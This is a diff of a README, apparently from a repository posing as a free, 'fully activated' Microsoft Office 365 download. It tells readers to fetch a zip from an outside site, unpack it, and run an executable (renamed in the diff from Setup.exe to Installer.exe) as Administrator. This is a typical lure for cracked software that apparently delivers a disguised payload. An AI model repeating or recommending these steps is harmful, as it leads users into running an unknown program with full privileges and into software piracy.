MRNAUFALB/Microsoft-365-Free/README.md

 1️⃣ Download – Get the latest version from **[🔗 DOWNLOAD HERE](https://gitgames.su)**.
 2️⃣ Extract – Use WinRAR or 7-Zip to unpack the .zip file.
-3️⃣ Run as Admin – Right-click `Setup.exe` and select "Run as Administrator".
+3️⃣ Run as Admin – Right-click `Installer.exe` and select "Run as Administrator".
 4️⃣ Installation - wait for the program to be fully installed.
 5️⃣ Use - Enjoy Microsoft Office 365 fully activated!